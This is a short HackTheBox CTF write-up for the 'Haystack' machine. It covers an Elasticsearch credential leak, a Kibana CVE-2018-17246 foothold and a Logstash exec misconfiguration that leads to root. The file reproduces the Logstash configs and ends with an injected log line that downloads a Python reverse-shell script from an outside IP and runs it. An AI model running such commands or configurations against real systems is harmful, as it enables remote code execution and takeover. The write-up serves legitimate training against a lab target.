Haystack — HackTheBox Writeup

Haystack retires this week, it was an easy difficulty box where we see some stego stuff and get initial credentials from Elastic search database. With the obtained credentials, we can SSH in and by exploiting CVE-2018–17246 in Kibana, I get shell as kibana. Kibana user has access to the LogStash config, which is misconfigured to allow code execution via a misconfigured log as root.

Preetham Bomma
Nov 7 · 5 min read

Enumeration and Recon

Let’s start off with a nmap scan,

80 — HTTP

The website looks like this,

Elasticsearch — 9200

It’s running version 6.4.2 elastic search. I read it’s documentation to get some overview of it.

Shell as security

Privesc to Kibana

We can safely assume that we are working on an ELK stack, which stands for
Elasticsearch, Logstash, Kibana.

ssh security@10.10.10.115 -L 5601:127.0.0.1:5601

Shell as Kibana

Privesc to Root

Configuration files of logstash are present in /etc/logstash/conf.d

input.confinput {
file {
path => "/opt/kibana/logstash_*"
start_position => "beginning"
sincedb_path => "/dev/null"
stat_interval => "10 second"
type => "execute"
mode => "read"
}
}
filter.conffilter{
if [type] == "execute" {
grok {
match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
}
}
}
output.confif [type] == "execute" {
stdout { codec => json }
exec {
command => "%{comando} &"
}
}
}
Ejecutar comando: curl 10.10.15.236/pyshell.py -o /tmp/kk.py;python /tmp/kk.py

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Preetham Bomma

Written by

Cyber Security Enthusiast. Youtuber. Abacus Grand Master. My playlist https://www.youtube.com/playlist?list=PLprCnFT-0k_g8PEeDP-EQhZ9hSHUlbRVS

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade